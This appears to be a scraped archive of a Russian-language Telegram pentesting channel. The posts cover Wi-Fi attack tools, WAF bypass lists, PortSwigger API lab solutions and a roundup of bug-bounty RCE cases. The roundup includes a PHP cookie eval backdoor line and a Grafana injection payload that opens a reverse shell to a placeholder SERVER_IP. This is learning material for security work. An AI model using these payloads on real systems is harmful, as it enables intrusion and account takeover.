#Arm1tage
Open in Telegram
Разные заметки, инструменты, новости и прочее из мира и моего опыта в Кибербезопасности. В общем "Пентест без мОразма"© 🇺🇦🇺🇦🇺🇦
Show more1 477
Subscribers
No data24 hours
No data7 days
No data30 days
Posts Archive
1 477
Тестируем Wi-Fi
Начнем новый год с изучения новых навыков. Начнем с Ви-Фи, так как тут нет совершенно ничего сложного, зато дополнительный плюсик в вашем резюме будет очень даже кстати.
Нашел крутую методичку на хабре, где автор рассказывает про основные подходы к тестированию беспроводных сетей, а именно:
Атаки:
- Перехват WPA/WPA2 Handshake и дальнейший брут + атака на PMKID
- ARP Request Replay атака на WEP
- WPS Pin и Pixie Dust
- Атаки на WPA/WPA2-Enterprise (RADIUS)
- Атаки социальной инженерии (Evil Twin, Captive Portal)
Инструменты:
- Семейство airmon-ng инструментов
- reaver
- wifite
- wifiphisher
И другие
Правда у этого всего есть одно важное условние. Если вы планируете проводить тестирование используя виртуальную машину, вам придется докупать внешний Wi-Fi модуль (например от Alfa Networks). В методичке расписаны популярные адаптеры, что может помочь в выборе модели. В ином случае используем, например, тот-же кали как основную машину или ставим её на флешку.
Ссылка на методичку
#wifi
1 477
Желаю, чтобы все дерьмо осталось в 2023 и 2024 приблизил длинную взлётную полосу вашего самолета в концу и вы достигли желаемого. С праздником!
1 477
Нужно хоть немного радости под конец года принести народу. Год и так не сахар, хоть закончим на мажорной ноте.
1 477
Ну че, уважаемые, уже приготовили оливье? Ёлку нарядили? Мандаринами вкинулись и погнали?
1 477
Полезное
Чувак собрал большой список обходов WAF, найденных багхантерами в твиттере. В список входят такие файрволлы, как: Imperva, Akamai, F5, Checkpoint, Fortinet и другие.
https://github.com/waf-bypass-maker/waf-community-bypasses/tree/main
#waf
1 477
По итогам вышел самый лаконичный вариант. Мне понравился концепт использовать букву как лого а полную вариацию (4 вариант) как для всяких постов и тп.
Благодарность за участие, уважаемые господа.
1 477
А ну и подрубил комменты, авось у кого какие мысли есть не только по поводу аватарки но контента на канале вцелом. Может кто-то хочет что-то порекомендовать, добавить, изменить и тп. Дерзайте.
1 477
Уважаемые господа, желаю доброго вечера.
Я хотел создать из этого канала что-то такое-эдакое запоминающееся и существенно отличающееся от миллиона остальных пабликов по кибербезу. Мне лично нравится все, что связано с этим каналом: название, контент и аудитория. Все, кроме аватарки. Нет, сама по себе она крутая, закладывает в себя изначальный концепт канала - уютное место, где я выступаю в роли пацана, который погружается в мир кибербеза. Но время идет и пора признать, что мы уже далеко не пацаны а ебейшие и прожжённые пентестеры. Потому я решил всерьез заняться ебейшим логотипом/картинкой для канала и запросил помощи у своего самого крутого дизайнера, которого я знаю (это тот самый человек, в котором я уверен, что его невозможно будет заменить ИИ).
Я не имел конкретной идеи, и выступал в роли типичного заказчика: "ну я ниняю я хачу вот так, а так ни хачу". В итоге дизайнер провел психологический анализ автора и собрав все компоненты и составляющие канала были разработаны пару концептов, которые поразили меня до глубины души (на то он блять и дизайнер).
В общем мне понравились все варианты и я решил дать окончательный вердикт своим подписчикам. Все таки наш общий канал, хули. Так что дерзайте (кстати за то, что текст может не поместиться в круглую рамочку аватарки не переживайте, мы подстроим фотку под круг).
1 477
API Labs
На моей нелюбимой платформе SwiggerPort, не выкатили новые лабки по АПИ (я кстати не делал эти лабки, нет). А это значит, что не выходит и новый пост на не моём паблике (я кстати не админ этого паблика, нет).
Суть этого раздела дать тебе понять, что фаззить, сука, надо. И надо это делать красиво. А чтобы и ты мог делать это красиво, можешь использовать вот этот лист с параметрами для фаззинга.
🤨1. Exploiting an API endpoint using documentation
GET /api/ DELETE /api/user/carlos🤨2. Exploiting server-side parameter pollution in a query string Находим forgotPassword.js файл и выясняем, что есть параметр reset-token. Теперь создаем POST /forgot-password запрос с %26 символом (означает, что он декодируется в & на серверной части) и фаззим (например через интрудер) параметр, там где $$:
csrf={ваш_csrf}&username=administrator%26$$
В итоге с помощью фаззинга находим параметр field. Вспоминаем, что мы нашли в жс коде ранее параметр ресет-токен и составляем финальный вид:
csrf={ваш_csrf}&username=administrator%26field=reset_token
Таким образом вы говорите серверу (из-за parameter pollution) выдать вам ресет токен пользователя администратор.
🤨3. Finding and exploiting an unused API endpoint
Меняем GET на PATCH:
PATCH /api/products/1/price
{
"price":0
}
🤨4. Exploiting a mass assignment vulnerability
Ищем параметры в ответе сервера:
GET /api/checkout
"chosen_discount":{"percentage":0}
Теперь создаем POST /api/checkout реквест с найденным ранее параметром. Изменяем значение percentage на 100 (типа 100% скидка понял да):
{"chosen_products":[{"product_id":"1","quantity":1}],
"chosen_discount":{"percentage":100}}
#portswigger #api1 477
Мысли в слух
Автор соскреб пару шекелей с завтраков и купил себе премиум (как же я ненавижу этот ебучий капиталистический мир, где все имеет подписку. Чекайте, скоро епл прознает, что выгоднее будет не продавать телефон а давать на него подписку). В первую же очередь пошел смотреть как вывести в топ 10 всех телеграмм каналов свой канал и въебенил в него все бусты.
Дополнительно могу сказать, что павел дуров гандонище, ведь для того, чтобы повысить уровень своего канала на 1 уровень мне нужно было 5 бустов, а у меня было всего 4. Потому с помощью моего ебейшего кореша я смог достичь 1 уровня своего канала.
Зачем я все это делал? А затем, что я провожу реформу смайликов. Как же меня заебал 👍 смайлик, я его терпеть не могу. Потому я его заменю на 🤘, так будет интереснее. Остальные оставлю.
Такие пироги. Всем спасибо все свободны.
1 477
Remote Code Execution | Command Injection
RCE сложная и проворная уязвимость, которую хер так просто найдешь при багбаунти или АпСеке. Попался на глаза вот такой ролик, где чувак рассказывает про случаи инъекций команд, в каких местах они вызываются и как находятся. Я решил просто расписать коротко каждый случай из видео с прикрепленным к нему статьей/РоС-ом, чтобы не долбаться каждый раз и не пересматривать видос.
1. Сложная RCE через миграцию GitLab репозиториев с одного инстанса на другой. РоС.
2. /.git/config раскрывает ключ, который можно использовать для выполнения команд на сервере. Статья.
3. Выполнение команд прямо через куки на сервере с PHP (Статья):
{$_COOKIE['c'] .= ';';eval($_COOKIE['c']);exit;}
4. Сервер на Руби при фаззинге параметров выдает ошибку через Rack и палит секрет для подписи куки. С помощью этого секрета создаем свой сериализованный объект с РЦЕ внутри. Статья.
5. RCE через CSRF на ажур, с интересным обходом проверки Origin (Статья):
https://<my-webapp>.scm.azurewebsites.net._.<attacker-site>./
6. Классическая SSTI на uber через имя профиля с отрабатыванием кода в письме. PoC.
7. RCE через SQL инъекцию. PoC.
8. Dependency Confusion. Об этом типе атак я делал пост ранее.
9. 0day уязвимости: Secure VPN.
10. RCE через картинки: ExifTool.
11. RCE через инъекцию опций в git.
12. Инъекция в параметр СМТП сервера на Grafana. РоС.
"password": "x\r\n[plugin.grafana-image-renderer]\r\nrendering_args=--renderer-cmd-prefix=bash -c bash$IFS-l$IFS>$IFS/dev/tcp/SERVER_IP/4444$IFS0<&1$IFS2>&1"
13. Классический RCE через SSRF через Gopher. Статья.
14 Потенциальная RCE через генерацию PDF файлов с использованием headless Chromium. Репорт.
#rce1 477
А у нас тут, оказывается, собралась в общей сложности целая тысяча пенистестеров. Расчехляйте водяру господа, пора нам всем протестировать длительность алкогольного делирия, знаете ли. Благодарность за вашу активность под постами, когда я очередной раз вижу клоуна или огонек, внутри меня что-то загорается, так и хочется продолжать бурпить мемные посты с шутками про пенисы и турбо-интрудер, которые никак не будут похожи на пресный контент в других пабликах.
Карочи спс (вот да епты бла, вот такое поздравление).
1 477
Заебись.
Прикупил себе адаптер от альфы (автор очень хотел пофлексить) и пошел заострять свои знания по взлому ВиФи сетей. Я весь такой из себя хакер-хуякер поставил пароль 32 символа на вайфай сеть, выключил всякие там надстройки и изменил дефолтный пароль на админ панели с вычурным ебалом смотрел на себя в зеркало и говорил:"Ну крут, бля". Пошел значится я по классной методичке по пентесту вифи (об этом сделаю пост позже) проверять че там у меня по домашней сети. Каково было моё удивление, когда я внезапно обнаружил смачный такой кал в своих шароварах, когда первая же атака из методички (даже сам автор сказал шо шансы малы на такую атаку, да, да проверяй епты) прояснила мою больную голову, что я та еще лалка, потому что мой базированный гигачад шлёпа пароль был взломан за 2(!!!) секунды!!
Вывод: вырубай ты этот WPS к ебеням братан.
1 477
Обнаруживаем и Обходим WAF
Отличный инструмент для обнаружения Web Application Firewall. Содержит проверки для 88 различных веб-файрволлов, таких как: CloudFlare, Imperva, BIG-IP, FortiWeb и других.
Так же предоставляет возможность обхода обнаруженной защиты посредством 30+ встроенных методов тамперинга или с помощью вашего листа с полезными нагрузками.
Пример использования:
whatwaf -u http://kek.com --ra -t 10https://github.com/Ekultek/WhatWaf #waf #cloudflare
